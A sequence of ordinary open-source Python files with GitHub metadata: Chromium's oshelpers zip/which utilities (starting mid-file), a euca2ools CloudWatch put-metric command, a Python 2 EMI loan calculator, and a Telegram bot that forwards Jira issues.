'tmp/tmpfoobar/something'
>>> MakeZipPath('./somefile.txt', False, False)
'somefile.txt'
>>> MakeZipPath('somedir', True, False)
'somedir/'
>>> MakeZipPath('../dir/filename.txt', False, False)
'../dir/filename.txt'
>>> MakeZipPath('dir/../filename.txt', False, False)
'filename.txt'
"""
zip_path = os_path
if iswindows:
import ntpath
# zipfile paths are always posix-style. They also have the drive
# letter and leading slashes removed.
zip_path = ntpath.splitdrive(os_path)[1].replace('\\', '/')
if zip_path.startswith('/'):
zip_path = zip_path[1:]
zip_path = posixpath.normpath(zip_path)
# zipfile also always appends a slash to a directory name.
if isdir:
zip_path += '/'
return zip_path
def OSMakeZipPath(os_path):
return MakeZipPath(os_path, os.path.isdir(os_path), sys.platform == 'win32')
def Zip(args):
"""A Unix style zip.
Compresses the listed files."""
parser = optparse.OptionParser(usage='usage: zip [Options] zipfile list')
parser.add_option(
'-r', dest='recursive', action='store_true',
default=False,
help='recurse into directories')
parser.add_option(
'-q', dest='quiet', action='store_true',
default=False,
help='quiet operation')
options, files = parser.parse_args(args)
if len(files) < 2:
parser.error('ERROR: expecting ZIPFILE and LIST.')
dest_zip = files[0]
src_args = files[1:]
src_files = []
for src_arg in src_args:
globbed_src_args = glob.glob(src_arg)
if not globbed_src_args:
if not options.quiet:
print 'zip warning: name not matched: %s' % (src_arg,)
for src_file in globbed_src_args:
src_file = os.path.normpath(src_file)
src_files.append(src_file)
if options.recursive and os.path.isdir(src_file):
for root, dirs, files in os.walk(src_file):
for dirname in dirs:
src_files.append(os.path.join(root, dirname))
for filename in files:
src_files.append(os.path.join(root, filename))
zip_stream = None
# zip_data represents a list of the data to be written or appended to the
# zip_stream. It is a list of tuples:
# (OS file path, zip path/zip file info, and file data)
# In all cases one of the |os path| or the |file data| will be None.
# |os path| is None when there is no OS file to write to the archive (i.e.
# the file data already existed in the archive). |file data| is None when the
# file is new (never existed in the archive) or being updated.
zip_data = []
new_files_to_add = [OSMakeZipPath(src_file) for src_file in src_files]
zip_path_to_os_path_dict = dict((new_files_to_add[i], src_files[i])
for i in range(len(src_files)))
write_mode = 'a'
try:
zip_stream = zipfile.ZipFile(dest_zip, 'r')
files_to_update = set(new_files_to_add).intersection(
set(zip_stream.namelist()))
if files_to_update:
# As far as I can tell, there is no way to update a zip entry using
# zipfile; the best you can do is rewrite the archive.
# Iterate through the zipfile to maintain file order.
write_mode = 'w'
for zip_path in zip_stream.namelist():
if zip_path in files_to_update:
os_path = zip_path_to_os_path_dict[zip_path]
zip_data.append((os_path, zip_path, None))
new_files_to_add.remove(zip_path)
else:
file_bytes = zip_stream.read(zip_path)
file_info = zip_stream.getinfo(zip_path)
zip_data.append((None, file_info, file_bytes))
except IOError:
pass
finally:
if zip_stream:
zip_stream.close()
for zip_path in new_files_to_add:
zip_data.append((zip_path_to_os_path_dict[zip_path], zip_path, None))
if not zip_data:
print 'zip error: Nothing to do! (%s)' % (dest_zip,)
return 1
try:
zip_stream = zipfile.ZipFile(dest_zip, write_mode, zipfile.ZIP_DEFLATED)
for os_path, file_info_or_zip_path, file_bytes in zip_data:
if isinstance(file_info_or_zip_path, zipfile.ZipInfo):
zip_path = file_info_or_zip_path.filename
else:
zip_path = file_info_or_zip_path
if os_path:
st = os.stat(os_path)
if stat.S_ISDIR(st.st_mode):
# Python 2.6 on the buildbots doesn't support writing directories to
# zip files. This was resolved in a later version of Python 2.6.
# We'll work around it by writing an empty file with the correct
# path. (This is basically what later versions do anyway.)
zip_info = zipfile.ZipInfo()
zip_info.filename = zip_path
zip_info.date_time = time.localtime(st.st_mtime)[0:6]
zip_info.compress_type = zip_stream.compression
zip_info.flag_bits = 0x00
zip_info.external_attr = (st[0] & 0xFFFF) << 16L
zip_info.CRC = 0
zip_info.compress_size = 0
zip_info.file_size = 0
zip_stream.writestr(zip_info, '')
else:
zip_stream.write(os_path, zip_path)
else:
zip_stream.writestr(file_info_or_zip_path, file_bytes)
if not options.quiet:
if zip_path in new_files_to_add:
operation = 'adding'
else:
operation = 'updating'
zip_info = zip_stream.getinfo(zip_path)
if (zip_info.compress_type == zipfile.ZIP_STORED or
zip_info.file_size == 0):
print ' %s: %s (stored 0%%)' % (operation, zip_path)
elif zip_info.compress_type == zipfile.ZIP_DEFLATED:
print ' %s: %s (deflated %d%%)' % (operation, zip_path,
100 - zip_info.compress_size * 100 / zip_info.file_size)
finally:
zip_stream.close()
return 0
def FindExeInPath(filename):
env_path = os.environ.get('PATH', '')
paths = env_path.split(os.pathsep)
def IsExecutableFile(path):
return os.path.isfile(path) and os.access(path, os.X_OK)
if os.path.sep in filename:
if IsExecutableFile(filename):
return filename
for path in paths:
filepath = os.path.join(path, filename)
if IsExecutableFile(filepath):
return os.path.abspath(os.path.join(path, filename))
def Which(args):
"""A Unix style which.
Looks for all arguments in the PATH environment variable, and prints their
path if they are executable files.
Note: If you pass an argument with a path to which, it will just test if it
is executable, not if it is in the path.
"""
parser = optparse.OptionParser(usage='usage: which args...')
_, files = parser.parse_args(args)
if not files:
return 0
retval = 0
for filename in files:
fullname = FindExeInPath(filename)
if fullname:
print fullname
else:
retval = 1
return retval
FuncMap = {
'cp': Copy,
'mkdir': Mkdir,
'mv': Move,
'rm': Remove,
'zip': Zip,
'which': Which,
}
def main(args):
if not args:
print 'No command specified'
print 'Available commands: %s' % ' '.join(FuncMap)
return 1
func = FuncMap.get(args[0])
if not func:
print 'Do not recognize command: ' + args[0]
print 'Available commands: %s' % ' '.join(FuncMap)
return 1
return func(args[1:])
if __name__ == '__main__':
sys.exit(main(sys.argv[1:]))
|
{
"content_hash": "ecbdffe2453c52bb0439e9afa9b6edeb",
"timestamp": "",
"source": "github",
"line_count": 531,
"max_line_length": 80,
"avg_line_length": 31.322033898305083,
"alnum_prop": 0.6287878787878788,
"repo_name": "loopCM/chromium",
"id": "2ae8c4a2f3ce83f955584ea27152f3d67ca44811",
"size": "16821",
"binary": false,
"copies": "3",
"ref": "refs/heads/trunk",
"path": "native_client_sdk/src/tools/oshelpers.py",
"mode": "33261",
"license": "bsd-3-clause",
"language": [],
"symlink_target": ""
}
|
import argparse
from requestbuilder import Arg, MutuallyExclusiveArgList
from euca2ools.commands.argtypes import delimited_list
from euca2ools.commands.monitoring import CloudWatchRequest
from euca2ools.commands.monitoring.argtypes import cloudwatch_dimension
def _statistic_set(set_as_str):
pairs = {}
for pair in set_as_str.split(','):
try:
key, val = pair.split('=')
except ValueError:
raise argparse.ArgumentTypeError(
'statistic set must have format KEY1=VALUE1,...')
try:
pairs[key] = float(val)
except ValueError:
raise argparse.ArgumentTypeError('value "{0}" must be numeric'
.format(val))
for field in ('Maximum', 'Minimum', 'SampleCount', 'Sum'):
if field not in pairs:
raise argparse.ArgumentTypeError(
'value for statistic "{0}" is required'.format(field))
return pairs
class PutMetricData(CloudWatchRequest):
DESCRIPTION = 'Add data points or statistics to a metric'
ARGS = [Arg('-m', '--metric-name', dest='MetricData.member.1.MetricName',
metavar='METRIC', required=True,
help='name of the metric to add data points to (required)'),
Arg('-n', '--namespace', dest='Namespace', required=True,
help="the metric's namespace (required)"),
MutuallyExclusiveArgList(
Arg('-v', '--value', dest='MetricData.member.1.Value',
metavar='FLOAT', type=float,
help='data value for the metric'),
Arg('-s', '--statistic-values', '--statisticValues',
dest='MetricData.member.1.StatisticValues',
metavar=('Maximum=FLOAT,Minimum=FLOAT,SampleCount=FLOAT,'
'Sum=FLOAT'), type=_statistic_set,
help='''statistic values for the metric. Maximum, Minimum,
SampleCount, and Sum values are all required.'''))
.required(),
Arg('-d', '--dimensions', dest='Dimensions.member',
metavar='KEY1=VALUE1,KEY2=VALUE2,...',
type=delimited_list(',', item_type=cloudwatch_dimension),
help='the dimensions of the metric to add data points to'),
Arg('-t', '--timestamp', dest='MetricData.member.1.Timestamp',
metavar='YYYY-MM-DDThh:mm:ssZ',
help='timestamp of the data point'),
Arg('-u', '--unit', dest='MetricData.member.1.Unit',
metavar='UNIT', help='unit the metric is being reported in')]
|
{
"content_hash": "12fdffbfa5dcdae9477164bfa648a0d4",
"timestamp": "",
"source": "github",
"line_count": 56,
"max_line_length": 79,
"avg_line_length": 47.642857142857146,
"alnum_prop": 0.5745877061469266,
"repo_name": "vasiliykochergin/euca2ools",
"id": "0705c9feac1e6552c84f8fdff398b76b0f127823",
"size": "4015",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "euca2ools/commands/monitoring/putmetricdata.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Python",
"bytes": "1220919"
},
{
"name": "Shell",
"bytes": "872"
}
],
"symlink_target": ""
}
|
class EMI_CALCULATOR(object):
# Data attributes
# Helps to calculate EMI
Loan_amount = None # assigning none values
Month_Payment = None # assigning none values
Interest_rate = None #assigning none values
Payment_period = None #assigning none values
def get_loan_amount(self):
#get the value of loan amount
self.Loan_amount = input("Enter The Loan amount(in rupees) :")
pass
def get_interest_rate(self):
# get the value of interest rate
self.Interest_rate = input("Enter The Interest rate(in percentage(%)) : ")
pass
def get_payment_period(self):
# get the payment period"
self.Payment_period = input("Enter The Payment period (in month): ")
pass
def calc_interest_rate(self):
# To calculate the interest rate"
self.get_interest_rate()
if self.Interest_rate > 1:
self.Interest_rate = (self.Interest_rate /100.0)
else:
print "You have not entered The interest rate correctly ,please try again "
pass
def calc_emi(self):
# To calculate the EMI"
try:
self.get_loan_amount() #input loan amount
self.get_payment_period() #input payment period
self.calc_interest_rate() #input interest rate and calculate the interest rate
except NameError:
print "You have not entered Loan amount (OR) payment period (OR) interest rate correctly,Please enter and try again. "
try:
self.Month_Payment = (self.Loan_amount*pow((self.Interest_rate/12)+1,
(self.Payment_period))*self.Interest_rate/12)/(pow(self.Interest_rate/12+1,
(self.Payment_period)) - 1)
except ZeroDivisionError:
print "ERROR!! ZERO DIVISION ERROR , Please enter The Interest rate correctly and Try again."
else:
print "Monthly Payment is : %r"%self.Month_Payment
pass
if __name__ == '__main__':# main method
Init = EMI_CALCULATOR() # creating instances
Init.calc_emi() #to calculate EMI
|
{
"content_hash": "156d800d3d9f894a6cffca08dec6c0f9",
"timestamp": "",
"source": "github",
"line_count": 68,
"max_line_length": 136,
"avg_line_length": 34.10294117647059,
"alnum_prop": 0.5627425614489003,
"repo_name": "ActiveState/code",
"id": "ca78d35032e1d7b724a556b732f7a5b2ecd729ed",
"size": "2685",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "recipes/Python/579086_python_EMI_calculator/recipe-579086.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "35894"
},
{
"name": "C",
"bytes": "56048"
},
{
"name": "C++",
"bytes": "90880"
},
{
"name": "HTML",
"bytes": "11656"
},
{
"name": "Java",
"bytes": "57468"
},
{
"name": "JavaScript",
"bytes": "181218"
},
{
"name": "PHP",
"bytes": "250144"
},
{
"name": "Perl",
"bytes": "37296"
},
{
"name": "Perl 6",
"bytes": "9914"
},
{
"name": "Python",
"bytes": "17387779"
},
{
"name": "Ruby",
"bytes": "40233"
},
{
"name": "Shell",
"bytes": "190732"
},
{
"name": "Tcl",
"bytes": "674650"
}
],
"symlink_target": ""
}
|
import logging
from datetime import datetime
from peewee import DoesNotExist
from telegram import ParseMode
from telegram.ext import JobQueue
from config import JIRA_REQUESTS_SECONDS_PERIOD
from model import Chat, Permission, User
from service import jira_service
def init_bot(job_queue: JobQueue):
for chat in Chat.select(Chat):
add_job(job_queue, chat)
def help_command(bot, update):
bot.send_message(text="Use next commands to work with bot:" + "\n" +
"/set <username> - to setup user who's issues you "
"want to get" + "\n" +
"/me - to see your user_id",
chat_id=update.message.chat_id)
def my_id_command(bot, update):
bot.send_message(
text="Your userId - *{0}*".format(update.message.from_user.id),
chat_id=update.message.chat_id, parse_mode=ParseMode.MARKDOWN)
def set_user(bot, update, args, job_queue: JobQueue):
if update.message.from_user.id not in [p.t_id for p in
Permission.select(Permission.t_id)]:
update.message.reply_text(
"You don't have permission to get issues from this jira-service")
return
user, _ = User.get_or_create(name=args[0])
user.last_updated = datetime.now()
user.save()
t_id = update.message.chat_id
try:
chat = Chat.get(t_id=t_id)
except DoesNotExist:
chat = Chat.create(t_id=t_id)
chat.user = user
chat.save()
add_job(job_queue, chat)
update.message.reply_text(
'You will get issues notifications from user: ' + user.name)
def send_issue(bot, job):
chat = job.context
chat_id = chat.t_id
try:
for issue in jira_service.get_new_issues(username=chat.user.name):
bot.send_message(chat_id=chat_id, text=issue.get_info(),
parse_mode=ParseMode.MARKDOWN)
except Exception:
logging.exception(
"{0}: Exception in sending issues to user with id:{1}".format(
datetime.now(), chat_id))
def add_job(job_queue: JobQueue, chat: Chat):
for job in job_queue.jobs():
if job.context.id == chat.id:
job.enabled = False
job.schedule_removal()
job_queue.run_repeating(send_issue, int(JIRA_REQUESTS_SECONDS_PERIOD),
context=chat)
|
{
"content_hash": "85e5ba7548b33391b46dcc3f2541a530",
"timestamp": "",
"source": "github",
"line_count": 79,
"max_line_length": 79,
"avg_line_length": 30.468354430379748,
"alnum_prop": 0.6024096385542169,
"repo_name": "boggard/jira-telegram-bot",
"id": "76cfc6340e1c065f048119caae5584ffb5db978d",
"size": "2407",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "service/chat_service.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "10138"
}
],
"symlink_target": ""
}
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.